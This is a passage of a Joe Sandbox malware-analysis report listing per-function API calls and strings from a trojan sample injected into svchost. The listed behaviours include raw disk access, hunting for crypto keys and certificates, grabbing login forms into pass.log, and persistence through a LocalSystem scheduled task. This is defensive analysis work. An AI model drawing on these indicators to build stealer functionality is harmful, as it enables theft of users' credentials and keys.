Function 02C82030 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C82051
GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
_snprintf.MSVCRT ref: 02C820A5
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,76229300), ref: 02C820FB
GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
CloseHandle.KERNEL32(00000000), ref: 02C82123

Strings

\\.\PhysicalDrive%u, xrefs: 02C82094

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FileHandle$CloseCreateCurrentDirectoryDriveInformationTypeWrite_snprintfmemset
String ID: \\.\PhysicalDrive%u
API String ID: 1874144376-3292898883
Opcode ID: 3ee585f743a4ea84abc023b537e90a069510e70f219c765b8d1bfac83f861e4a
Instruction ID: 18f3149309e499d998e30ee7a0284b8f21fa454f41ee8954f8bd106cee32a35a
Opcode Fuzzy Hash: 3ee585f743a4ea84abc023b537e90a069510e70f219c765b8d1bfac83f861e4a
Instruction Fuzzy Hash: 9321D671D81254A7E722E654DC4DBE9B3ACDF44719F208689FE44A60C0D7B45F848AA2

Function 02C7C9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57stringCOMMON

Download Yara Rule

APIs

GetComputerNameA.KERNEL32(02CBD6A8,?), ref: 02C7CA07
lstrlenA.KERNEL32(02CBD6A8,?,?,02C861D1), ref: 02C7CA12
wsprintfA.USER32 ref: 02C7CA52
wsprintfA.USER32 ref: 02C7CA62
wsprintfA.USER32 ref: 02C7CA72
wsprintfA.USER32 ref: 02C7CA7F
wsprintfA.USER32 ref: 02C7CA8C

Strings

MSCTF.Shared.MUTEX.%x, xrefs: 02C7CA75, 02C7CA82
MSCTF.Shared.MAPPING.%x, xrefs: 02C7CA48, 02C7CA58, 02C7CA68

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: wsprintf$ComputerNamelstrlen
String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
API String ID: 776485234-1938657081
Opcode ID: 34c49a98c2f3da91a95aee6fd643c74d9e5d278e1fff4f1a5c1e83be57eb9a20
Instruction ID: 4f281b4965ab4645f2a855e6039ddb837b837f02e4bdfe07565213358f8d337e
Opcode Fuzzy Hash: 34c49a98c2f3da91a95aee6fd643c74d9e5d278e1fff4f1a5c1e83be57eb9a20
Instruction Fuzzy Hash: 6A012D72ED02587DF22666E5AC47DF77B5CDF81A52F410776F84752040D9A05E00CAB2

Function 02C9E6D0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000006,00000001,02C98817,00000004), ref: 02C9E737

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: c90b312789074b0205176c452a4f2296d311b816923bfb5513e3d95fbb56f09d
Instruction ID: 8809aeba94acb1b4cd9fd2406f2df005efe3646a09cd2de55401464d0af224d0
Opcode Fuzzy Hash: c90b312789074b0205176c452a4f2296d311b816923bfb5513e3d95fbb56f09d
Instruction Fuzzy Hash: D4519F70A00B01ABEB20CF79C888BD7B7F5EF85714F60895ED56E87280DB31A6019B50

Function 02C91150 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C9116E
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91193
StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02C911A5

Strings

\clmain.exe, xrefs: 02C91199

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FileModuleNamememset
String ID: \clmain.exe
API String ID: 350293641-582869414
Opcode ID: 07b77963ca84e51e3e4e4426c7f825cba2275471efa8de69b28ec33cb12ce073
Instruction ID: 8612c5f56324f6a3a35b79f9aaee419075629bab937a1ab13b56e47f2d9977c4
Opcode Fuzzy Hash: 07b77963ca84e51e3e4e4426c7f825cba2275471efa8de69b28ec33cb12ce073
Instruction Fuzzy Hash: 97F0AE719942086BEB54D6749C46BE573ACDB54705F0006D5EA4DC60C0E7F155D88A91

Function 02C9C3DB Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C9C3F9
GetDriveTypeA.KERNEL32(?), ref: 02C9C43E
SetErrorMode.KERNEL32(00000001), ref: 02C9C4B2
free.MSVCRT ref: 02C9C4DF

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Drive$ErrorLogicalModeStringsTypefree
String ID:
API String ID: 2496910992-0
Opcode ID: 8c72acc23544a2b183772906408102910aa18aa9b5e8c7a720d7394e280cae27
Instruction ID: ddda68bf6b47aa3effb100a9642183e40d22baf30358de738433dca4d76275b1
Opcode Fuzzy Hash: 8c72acc23544a2b183772906408102910aa18aa9b5e8c7a720d7394e280cae27
Instruction Fuzzy Hash: EC313A7270429E8FCF10CE98E8886FE7758EF5A354F1006A3E94587241D7318766CBA2

Function 02C8F1B0 Relevance: 86.1, APIs: 42, Strings: 7, Instructions: 347memorysleepstringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C8F1D0
PathAddBackslashA.SHLWAPI(82c3199d), ref: 02C8F1F7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F235
GetLastError.KERNEL32 ref: 02C8F23F
IsUserAnAdmin.SHELL32 ref: 02C8F247
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F259
SetLastError.KERNEL32(00000000), ref: 02C8F260
SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8F29C
DeleteFileA.KERNEL32(?), ref: 02C8F2AA
PathAddBackslashA.SHLWAPI(82c3199d,?,?), ref: 02C8F2E5
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F31F
GetLastError.KERNEL32 ref: 02C8F329
IsUserAnAdmin.SHELL32 ref: 02C8F331
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F340

Part of subcall function 02C96FF0: UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000,?), ref: 02C97017
Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97037
Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97048
Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97061
Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97072

SetLastError.KERNEL32(00000000), ref: 02C8F347
GetFileAttributesA.KERNEL32(?), ref: 02C8F375
SetCurrentDirectoryA.KERNEL32(?), ref: 02C8F3A0
memset.MSVCRT ref: 02C8F3EB
lstrcpynA.KERNEL32(?,secret.key,00000104), ref: 02C8F405
memset.MSVCRT ref: 02C8F448
lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002), ref: 02C8F462
Sleep.KERNEL32(000003E8,?,?,02CB854C,00000002), ref: 02C8F487
memset.MSVCRT ref: 02C8F4CA
lstrcpynA.KERNEL32(?,pubkeys.key,00000104), ref: 02C8F4E4
Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002), ref: 02C8F509
GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C8F540
HeapValidate.KERNEL32(00000000), ref: 02C8F543
GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F550
HeapFree.KERNEL32(00000000), ref: 02C8F553
CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?), ref: 02C8F562
Sleep.KERNEL32(000003E8), ref: 02C8F573
ReleaseMutex.KERNEL32(00000000), ref: 02C8F57A
GetHandleInformation.KERNEL32 ref: 02C8F58E
CloseHandle.KERNEL32(00000000), ref: 02C8F5A0
GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002), ref: 02C8F5CD
HeapValidate.KERNEL32(00000000), ref: 02C8F5D0
GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F5DD
HeapFree.KERNEL32(00000000), ref: 02C8F5E0
GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002), ref: 02C8F5E9
HeapValidate.KERNEL32(00000000), ref: 02C8F5EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F5FD
HeapFree.KERNEL32(00000000), ref: 02C8F600

Strings

pubkeys.key, xrefs: 02C8F4D7, 02C8F4E8
keys.zip, xrefs: 02C8F35A
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02C8F559
path.txt, xrefs: 02C8F278
82c3199d, xrefs: 02C8F1F2, 02C8F1FD, 02C8F2E0, 02C8F2EB
P0#v, xrefs: 02C8F57A
secret.key, xrefs: 02C8F3F8, 02C8F409, 02C8F455

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$HandleProcess$ErrorFileLastPathmemset$CloseCreateDirectoryFreeInformationSleepValidatelstrcpyn$AdminAttributesBackslashFolderMakeMutexSystemUser$CurrentDeleteReleaseUnmapView
String ID: 82c3199d$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v$keys.zip$path.txt$pubkeys.key$secret.key
API String ID: 3271848171-1499704211
Opcode ID: e534e97740f12aed5e9c04bac7b4ab18669707fe01db89cb9ad0c100e8591fb1
Instruction ID: edd937d9dd211fdf14849e06959a517aaf84cf3747b41e19b0852adfee06e489
Opcode Fuzzy Hash: e534e97740f12aed5e9c04bac7b4ab18669707fe01db89cb9ad0c100e8591fb1
Instruction Fuzzy Hash: 06C13771A44385AFE722AF74DC49BAB7BE8EF85708F448A5CF54987140DB70D608CBA1

Function 02C7F860 Relevance: 75.6, APIs: 40, Strings: 3, Instructions: 311memorynetworkCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02C7F8A1
HeapAlloc.KERNEL32(00000000), ref: 02C7F8A4
memset.MSVCRT ref: 02C7F8BE
InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02C7F8DE
GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F8FF
HeapAlloc.KERNEL32(00000000), ref: 02C7F902
memset.MSVCRT ref: 02C7F917
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C7F92D
InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F949
InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F95C
GetProcessHeap.KERNEL32(00000008,00000110), ref: 02C7F96C
HeapAlloc.KERNEL32(00000000), ref: 02C7F96F
memset.MSVCRT ref: 02C7F98A
InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02C7F99D
GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F9E9
HeapAlloc.KERNEL32(00000000), ref: 02C7F9EC
memset.MSVCRT ref: 02C7FA00
memset.MSVCRT ref: 02C7FA10
memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7FA1E
_snprintf.MSVCRT ref: 02C7FA60
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA8C
HeapValidate.KERNEL32(00000000), ref: 02C7FA8F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA9C
HeapFree.KERNEL32(00000000), ref: 02C7FA9F
GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAAB
HeapValidate.KERNEL32(00000000), ref: 02C7FAAE
GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FABB
HeapFree.KERNEL32(00000000), ref: 02C7FABE
GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAD4
HeapValidate.KERNEL32(00000000), ref: 02C7FAD7
GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAE4
HeapFree.KERNEL32(00000000), ref: 02C7FAE7
GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C7FB06
HeapValidate.KERNEL32(00000000), ref: 02C7FB0F
GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB18
HeapFree.KERNEL32(00000000), ref: 02C7FB1B
GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB27
HeapValidate.KERNEL32(00000000), ref: 02C7FB2A
GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB33
HeapFree.KERNEL32(00000000), ref: 02C7FB36

Strings

UserAgent, xrefs: 02C7FA3D, 02C7FA49
}}}, xrefs: 02C7FA78
[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s, xrefs: 02C7FA59

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
API String ID: 1808236364-2343086565
Opcode ID: 5059307e4bb5ab225c1b9cbe16d8d201204079fcf2b91f4c19c6fad84db03181
Instruction ID: 79b30ae1e4b622c55ed223cae5a6f65302ab7b872334e227b12909a26e2ec0b2
Opcode Fuzzy Hash: 5059307e4bb5ab225c1b9cbe16d8d201204079fcf2b91f4c19c6fad84db03181
Instruction Fuzzy Hash: F9A1E471D40219ABDB11DFA89C89FEFBBB8EF84714F048549F904A7280DB709E05CBA1

Function 02C8C9E0 Relevance: 68.4, APIs: 25, Strings: 14, Instructions: 184threadCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,self.cer,00000000,00000000,00000000,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA1A
StrStrIA.SHLWAPI(?,\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA28
StrStrIA.SHLWAPI(00000001,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA35
StrStrIA.SHLWAPI(?,\micros~\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAA7
StrStrIA.SHLWAPI(?,\maxthon3\public\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAB7
StrStrIA.SHLWAPI(?,\microsoft\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAC7
StrStrIA.SHLWAPI(?,\crypto pro\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAD7
StrStrIA.SHLWAPI(?,\progra~1\crypto~1\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAE7
StrStrIA.SHLWAPI(?,\temporary internet files\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAF7
StrStrIA.SHLWAPI(?,:\users\public,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB07
StrStrIA.SHLWAPI(?,02CB81F4,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB17
StrStrIA.SHLWAPI(00000000,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB23
StrStrIA.SHLWAPI(?,\cryptokit\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB33
StrStrIA.SHLWAPI(?,:\progra~1\common~1\crypto~1,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB3F
CreateThread.KERNEL32(00000000,00000000,02C8B260,?,00000000,00000000), ref: 02C8CB62

Strings

self.cer, xrefs: 02C8CA14
\cryptokit\, xrefs: 02C8CB2D
\microsoft\crypto\, xrefs: 02C8CAC1
\crypto pro\, xrefs: 02C8CAD1
\crypto\, xrefs: 02C8CA22
\public\, xrefs: 02C8CA79, 02C8CA91
:\progra~1\common~1\crypto~1, xrefs: 02C8CB39
crypto, xrefs: 02C8CA4E
\micros~\crypto\, xrefs: 02C8CAA1
\progra~1\crypto~1\, xrefs: 02C8CAE1
\temporary internet files\, xrefs: 02C8CAF1
:\users\public, xrefs: 02C8CB01
\private\, xrefs: 02C8CA6C, 02C8CA85
\maxthon3\public\, xrefs: 02C8CAB1

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: :\progra~1\common~1\crypto~1$:\users\public$\crypto pro\$\crypto\$\cryptokit\$\maxthon3\public\$\microsoft\crypto\$\micros~\crypto\$\private\$\progra~1\crypto~1\$\public\$\temporary internet files\$crypto$self.cer
API String ID: 2422867632-4225811205
Opcode ID: d8506171dc54286aaa14f5635b2bd32ad6b004eb0e6c86e0684824d830d2683b
Instruction ID: f957749078c1dfe3f2d110b89996cccc822d6fa633d1d0f0118c3aedab972dff
Opcode Fuzzy Hash: d8506171dc54286aaa14f5635b2bd32ad6b004eb0e6c86e0684824d830d2683b
Instruction Fuzzy Hash: AB417271A8172675FA2AB6359C89FBB5E9C8ED09DCF108533FC06E2005EB74C70585B1

Function 00403440 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040348E
memset.MSVCRT ref: 004034AE
memset.MSVCRT ref: 004034CE
IsUserAnAdmin.SHELL32 ref: 004034D6
GetVersionExA.KERNEL32 ref: 004034F1

Part of subcall function 004033A0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
Part of subcall function 004033A0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
Part of subcall function 004033A0: OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
Part of subcall function 004033A0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
Part of subcall function 004033A0: CloseHandle.KERNEL32(00000000), ref: 00403427

GetTickCount.KERNEL32 ref: 00403535
_snwprintf.MSVCRT ref: 0040354E
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035AB
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035F7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035FE
memset.MSVCRT ref: 00403616
_snwprintf.MSVCRT ref: 00403630
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E

Strings

p=Dv, xrefs: 0040382B
<Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403454
\\?\globalroot\systemroot\system32\tasks\, xrefs: 00403477
<Actions , xrefs: 004036EA
task%d, xrefs: 0040353C
00-->, xrefs: 0040371F

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=Dv$task%d
API String ID: 1601901853-2684908384
Opcode ID: d0b0790f7991d78f00ea7e7fde430ce6b596ebd0b63758b6d90d9f24c7b2decc
Instruction ID: fd62d51515435fe7aa577a9a46339635c431e4e957a39cb3738b378977d63dce
Opcode Fuzzy Hash: d0b0790f7991d78f00ea7e7fde430ce6b596ebd0b63758b6d90d9f24c7b2decc
Instruction Fuzzy Hash: C5D1E0B2504301ABC720EF64CC48B5B7BA8EFC8751F048669FA45A72D1E774EA04CB99

Function 02C87A80 Relevance: 66.7, APIs: 28, Strings: 10, Instructions: 244memorystringthreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,7622F570,?,?), ref: 02C87AA3
HeapAlloc.KERNEL32(00000000), ref: 02C87AAA
memset.MSVCRT ref: 02C87ABE
IsBadReadPtr.KERNEL32(?,?), ref: 02C87ADB
memcpy.MSVCRT(00000000,?,?), ref: 02C87AEC
strstr.MSVCRT ref: 02C87AFD
strstr.MSVCRT ref: 02C87B10
PathAddBackslashA.SHLWAPI(82C31B07), ref: 02C87B3D
PathAppendA.SHLWAPI(?,82C31B07), ref: 02C87B4B
PathAddBackslashA.SHLWAPI(82C31B07), ref: 02C87B56
strstr.MSVCRT ref: 02C87BB8
strstr.MSVCRT ref: 02C87BCB
PathAddBackslashA.SHLWAPI(82C31CB5), ref: 02C87BFD
PathAppendA.SHLWAPI(?,82C31CB5), ref: 02C87C0B
PathAddBackslashA.SHLWAPI(82C31CB5), ref: 02C87C16
CreateThread.KERNEL32(00000000,00000000,02C90BE0,00000000,00000000,00000000), ref: 02C87C71
strstr.MSVCRT ref: 02C87C90
strstr.MSVCRT ref: 02C87CA3
PathAddBackslashA.SHLWAPI(82C31D7D), ref: 02C87CCF
PathAppendA.SHLWAPI(?,82C31D7D), ref: 02C87CDD
PathAddBackslashA.SHLWAPI(82C31D7D), ref: 02C87CE8
CreateThread.KERNEL32(00000000,00000000,02C92320,00000000,00000000,00000000), ref: 02C87D43
GetHandleInformation.KERNEL32(00000000,?), ref: 02C87D5B
CloseHandle.KERNEL32(00000000), ref: 02C87D6C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D7B
HeapValidate.KERNEL32(00000000), ref: 02C87D7E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D8B
HeapFree.KERNEL32(00000000), ref: 02C87D8E

Strings

&ctl00%24MainMenu%24Login1%24Password=, xrefs: 02C87C9D
pass_, xrefs: 02C87BC5
name_, xrefs: 02C87BB2
login=, xrefs: 02C87AF7
82C31D7D, xrefs: 02C87CCA, 02C87CD1, 02C87CE3, 02C87CEA
&ctl00%24MainMenu%24Login1%24UserName=, xrefs: 02C87C8A
pass.log, xrefs: 02C87B78, 02C87C38, 02C87D0A
password=, xrefs: 02C87B0A
82C31CB5, xrefs: 02C87BF8, 02C87BFF, 02C87C11, 02C87C18
82C31B07, xrefs: 02C87B38, 02C87B3F, 02C87B51, 02C87B58

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashHeapstrstr$AppendProcess$CreateHandleThread$AllocCloseFreeInformationReadValidatememcpymemset
String ID: &ctl00%24MainMenu%24Login1%24Password=$&ctl00%24MainMenu%24Login1%24UserName=$82C31B07$82C31CB5$82C31D7D$login=$name_$pass.log$pass_$password=
API String ID: 3712039096-1556596417
Opcode ID: bc4795ce0416027ea288db6e4c46cf741d845e9ab50ed49406029dc371d60518
Instruction ID: 252726fe71358585feb8e42241803de4c5eb0124164b5c0843582dd19360e73c
Opcode Fuzzy Hash: bc4795ce0416027ea288db6e4c46cf741d845e9ab50ed49406029dc371d60518
Instruction Fuzzy Hash: D8818E31E4075467E7129B249C99FEB7BAC9F81745F24C0A5FD4997280EB70E948CBE0

Function 02C8E3D0 Relevance: 65.0, APIs: 31, Strings: 6, Instructions: 253memorysynchronizationsleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82c319a5), ref: 02C8E3F8
CreateDirectoryA.KERNEL32(02CCB8D0,00000000), ref: 02C8E439
GetLastError.KERNEL32 ref: 02C8E43F
IsUserAnAdmin.SHELL32 ref: 02C8E447
PathMakeSystemFolderA.SHLWAPI(02CCB8D0), ref: 02C8E456
SetLastError.KERNEL32(00000000), ref: 02C8E45D
SetFileAttributesA.KERNEL32(02CCB8D0,00000000), ref: 02C8E499
DeleteFileA.KERNEL32(02CCB8D0), ref: 02C8E4A4
PathAddBackslashA.SHLWAPI(82c319a5,?,?), ref: 02C8E4E6
CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E521
GetLastError.KERNEL32 ref: 02C8E527
IsUserAnAdmin.SHELL32 ref: 02C8E52F
PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E53E
SetLastError.KERNEL32(00000000), ref: 02C8E545
CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E573
GetLastError.KERNEL32 ref: 02C8E579
IsUserAnAdmin.SHELL32 ref: 02C8E581
PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E590
SetLastError.KERNEL32(00000000), ref: 02C8E597
GetFileAttributesA.KERNEL32(?), ref: 02C8E5A1
memset.MSVCRT ref: 02C8E5D7
SHFileOperationA.SHELL32(?), ref: 02C8E651
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E662
Sleep.KERNEL32(000003E8), ref: 02C8E673
ReleaseMutex.KERNEL32(00000000), ref: 02C8E67A
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E68C
CloseHandle.KERNEL32(00000000), ref: 02C8E69C
GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6AE
HeapValidate.KERNEL32(00000000), ref: 02C8E6B1
GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6BE
HeapFree.KERNEL32(00000000), ref: 02C8E6C1

Strings

